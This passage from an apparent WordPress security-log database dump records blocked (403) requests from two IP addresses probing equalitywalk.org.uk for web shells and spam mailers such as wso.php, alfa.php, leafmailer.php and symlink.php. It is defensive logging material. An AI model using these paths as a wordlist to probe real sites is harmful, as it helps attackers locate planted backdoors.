Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','MupGTNQlIdciWXBPkagUb1xo',0,1673877672.8429,106,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/style.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','SNFDsfnhPq79VpOmZizvjoGJ',0,1673877865.5321,106,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/wp-admin/style.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','5m4QryPngLUjbqpXcNG1fuxO',0,1673877865.9971,137,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/s_e.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','75rwnVfv4CgTbijzeU8XZpDL',0,1673877867.1249,86,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/s_ne.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','6plsG0uCzn4V5fh7kqFwUYTO',0,1673877868.2783,111,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','XsRT3rGJSz7K6F1IcxtY2LBE',0,1673877869.3919,121,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/radio.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','8QvXa7KMRJHBVi5wrotdUzeb',0,1673877870.5087,96,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/doc.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','YDFsIxjpVP7OuvMULwe8caN0',0,1673877873.7518,139,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','OJAy7daLN4j65FmIMlu3srEk',0,1673877875.7109,108,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/beence.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','MEfvmt3ozshRIUrDNFYSncG8',0,1673877876.8603,97,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/ups.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','aURHG6YkcDAwI8n0xF1N4C7P',0,1673877877.9660,147,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/wp-signin.php?dizo&ping','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','vbRfXskn57Ua6gGrtPl4VizK',0,1673877879.8345,160,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/media-admin.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','p3thOQCRAfTE0xUBdI7MrHln',0,1673877880.9954,88,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','eq6hdaW3zCyMfJDAFOkYHT5V',0,1673877882.2528,94,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/wp-includes/wp-class.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','f4IvGjQVMLCmFODKJelsoScE',0,1673877884.5644,99,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/wp-includes/wp-atom.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','oE2CWavRk9uwq0J7GxQ1yfVZ',0,1673877885.8351,95,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/wp-includes/images/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','58xRi9h1LmQDWBqtTVJCgMp2',0,1673877887.0091,126,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','ehQYFUHLtCZfN6x514KGuzOo',0,1673877887.5157,96,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','8HsuVazARYDo9XIJ5y2pTheP',0,1673877888.6745,149,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','QokB81VZNSxqgtiyu64YdAJa',0,1673877889.9854,87,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/wp-booking.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','KX9gZDfCb63eNIYG4ivn5jSH',0,1673877891.2628,101,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/config.bak.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','ZGklbxPm0c3FzhBMiA7d82DX',0,1673877899.0544,161,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/legion.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','tSPGKLQHeki20NfhAOFr53n7',0,1673877900.5213,97,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/wp-plugins.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','1pBVSXm7O40JANWry2qI3fCe',0,1673877902.7804,94,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/gank.php.PhP','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','xYEQfgqj1b0CNz4Du9nhF8rl',0,1673877904.0503,98,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/archives.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','iGOfM0HjJeENaoFB8RmgLIbc',0,1673877906.3928,111,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/defau11.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','cGKvYAI7xSROByEV481phrN0',0,1673877907.5020,97,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/system_log.php?bala=up','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','DjeFtVz5lfOI0oi9AUguNRCk',0,1673877909.7676,94,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/wp-backup-sql-302.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','rKGj7dUe3f2RJCvq6BLSEYp9',0,1673877910.8782,116,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/error.php?phpshells','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','QRlODkSoEM3VKH5LvnUc8w17',0,1673877912.2221,92,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/index.php?3x=3x','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','Kd6TfPkten5mEvD7xiB1lgHR',0,1673877949.8202,98,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/olux.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','KQbHpsICXf21Dnzi6AmOqvad',0,1673877950.4417,95,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/xleet.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','uqnlb9LM85esrQBSIhNRovmd',0,1673877950.8518,97,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/wso.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','8QpUokl4JVyjRbKZxIN92mY1',0,1673877951.2539,93,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/shell.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','HkT860gIQv5uEVlCcJnROYZp',0,1673877951.6792,93,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/up.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','tRCv9JOs4YaVPkmXhDqLyW8u',0,1673877952.0978,109,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/upload.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','6ejXUfp0QGrI93OnlwxHPWFm',0,1673877952.6480,166,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/1.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','LEq123pXSjaPdmb5GJCVltMc',0,1673877953.2823,115,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/x.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','WIUt9waRj3mne0EqDuJYOdi4',0,1673877953.7991,114,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/z.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','qZKxJQuk3Af6Y9HXW0POw1cV',0,1673877954.3377,122,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/a.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','Y6pVjmU0kG8oSDiewZnxCHRb',0,1673877954.8511,121,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/test.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','Bl2p49Cvd1n5ETRr0QJXZghG',0,1673877955.4183,142,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/wp.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','fGRFVuXbEZz7lBC1Pr3xho5S',0,1673877956.0391,113,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/alfa.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','xXP5AlNhsDvKrZOEmbcWH93C',0,1673877956.5658,120,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/config.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','7ZCNiqTVeGrxhBtk1JnOlXbE',0,1673877957.1256,110,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/templates/beez3/index.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','KS5DeahT7ojO2BgUmx6MPFHI',0,1673877957.6496,95,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/about.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','ul30yBkvjfML8TEQZxXSncCa',0,1673877958.1470,131,'','GET',403,0,700,0,1,'',0),('20.165.29.249',346365433,'','https://www.equalitywalk.org.uk/shells.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','r1oswAYDvf3LmxuiJnp6SMNU',0,1673877958.5984,114,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','H7TyXVmJYKuI65ZctjOfis8Q',0,1673888017.2666,130,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/xxx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','4sXdtYKB6w9u3AURTCjnFram',0,1673888017.6112,118,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','BVdOKTpo83kGZiLANzJ5F9Uh',0,1673888018.6580,99,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','mLvyuqkot06AFeBDHwUfP7dZ',0,1673888018.9390,108,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','0fcJUXZwC2OYHzS8RBhI4FT1',0,1673888019.1534,120,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/alpha.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','tHRCWTxzyEfslD4cwkq3eoY7',0,1673888019.6588,101,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','gWvZat9sOUprVy57MwfQDGnz',0,1673888019.8916,116,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/send.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ryLRAPVSGoabFxvIM798Cz5q',0,1673888020.1681,88,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','X8ZKsuYJrUaAmy9w2cgxEI0O',0,1673888020.7175,132,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/leafmailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','wqst8lp4f72VzBxe6P1JyuFo',0,1673888020.9279,102,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/sender.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','1tCLpuf5EMb2jQvhOcqiU9W6',0,1673888021.1428,108,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/inbox.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Rw5H4L21VotBuDePOlcJrSsT',0,1673888021.4538,131,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','i8RxS7VuXQe3z9TpNKGPHs2I',0,1673888021.8081,104,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/ups.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','WGqev1fwxTNrMZ9Kntm7yhRY',0,1673888022.3205,150,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/media-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','hSrqRo8DLwZFCcEfGMt4PVWn',0,1673888022.6856,108,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8ymnwP4fgVQj5qvSNIKu9rMd',0,1673888022.8809,139,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/test.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','5PBX10twUnONQYIGdKmMxAFc',0,1673888023.1989,115,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/srx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','l6f8SFchwzOuZHA0UtGXP45r',0,1673888023.5316,103,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/1337.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','NacF0huUBA7MjlfndK9kybTZ',0,1673888023.9052,146,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/doc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','7PIkMvDJ9xdOp6KNnFYQj81B',0,1673888024.2550,144,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/xx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','kE135HbciunPT6N0yB7AYzZX',0,1673888024.4844,94,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/XxX.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','juTFy472Pvxg3IDLcV6plAGU',0,1673888024.7973,105,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','2h0GcVH5KvtpnAJEyYfOXwTa',0,1673888025.0819,109,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','nUM1ZFL8t6f0iqSzaCoJcrg4',0,1673888025.2877,122,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/alex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','W8j2ok3AdFJnwbP7lyrfC49O',0,1673888025.4864,98,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/marijuana.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','BJQgyeNwbuCnVcUtT0fMK4r3',0,1673888025.6618,100,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/gaza.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','wxUzJPtXueW2F8MD4l3IOLf6',0,1673888025.8679,103,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','mH2KefC6LJTGrFpwv8qyBgPb',0,1673888026.0693,106,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','B1ScVdZLsHwQlo2WXhOvzrmj',0,1673888026.4173,107,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/3index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','BgnqbLtJGYomsaZvdF4kIUpj',0,1673888026.7620,134,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','IhMKgmjNqaHVt84drf5U7kFR',0,1673888027.0635,98,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/wso1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','CcmQJhK6FTg87dxLU45XPsua',0,1673888027.4021,137,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','94nDLgM1CtIh7FJxmN3ROorb',0,1673888027.6280,101,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/priv8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','YEoabMxgUNkjvyAzq37T1eJh',0,1673888027.8087,100,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/bb.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','dTP5SL6wIqQC8ahmBvY90Opk',0,1673888027.9856,110,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','OmTltPCrMpeBxXV8n75YFfU0',0,1673888028.3079,99,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/Lux.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','6CPeMEdDZoJw7kQ5RYnyI3TA',0,1673888028.7299,93,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/haxor.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','BwtXsAQej0npd6xmGSWlg3bZ',0,1673888029.2550,114,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/xleet.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','gvDbs2XuQY4AOpNE9RGj7dh1',0,1673888029.6368,91,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/0byte.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','NsZtlPua1FD0pgOW9GfHmvcX',0,1673888029.9905,90,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/sym.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','KaQtVCfm01Zk3dXNDlRoJnjB',0,1673888030.2896,98,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/sym403.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','YsWFC7bv2ZnXN9QyfwitOA0q',0,1673888030.5065,88,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/xl.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','0HL6xBhFRO54DZekmziXPJ9c',0,1673888030.9094,103,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://equalitywalk.org.uk/symlink.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 